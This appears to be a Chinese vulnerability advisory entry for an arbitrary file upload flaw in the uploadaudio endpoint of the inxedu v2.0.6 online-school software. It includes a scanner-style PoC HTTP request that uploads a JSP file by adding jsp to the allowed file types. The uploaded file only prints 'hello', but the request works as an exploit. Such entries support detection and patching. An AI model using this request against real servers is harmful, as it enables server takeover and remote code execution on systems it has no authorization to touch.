漏洞描述
因酷教育软件开源网校程序 inxedu v2.0.6组件uploadaudio存在任意文件上传漏洞,攻击者可以利用该漏洞在服务器上执行恶意代码控制整个服务器。
因酷教育软件开源网校程序uploadaudio任意文件上传漏洞
PoC代码
POST /video/uploadaudio?param=image&fileType=jpg,gif,png,jsp,jpeg HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------308436435515370414691526924874
Priority: u=4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
-----------------------------308436435515370414691526924874
Content-Disposition: form-data; name="imgFile"; filename="1.jsp"
Content-Type: image/jpeg
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.1">
<jsp:directive.page contentType="text/html; charset=UTF-8"/>
hello
</jsp:root>
-----------------------------308436435515370414691526924874--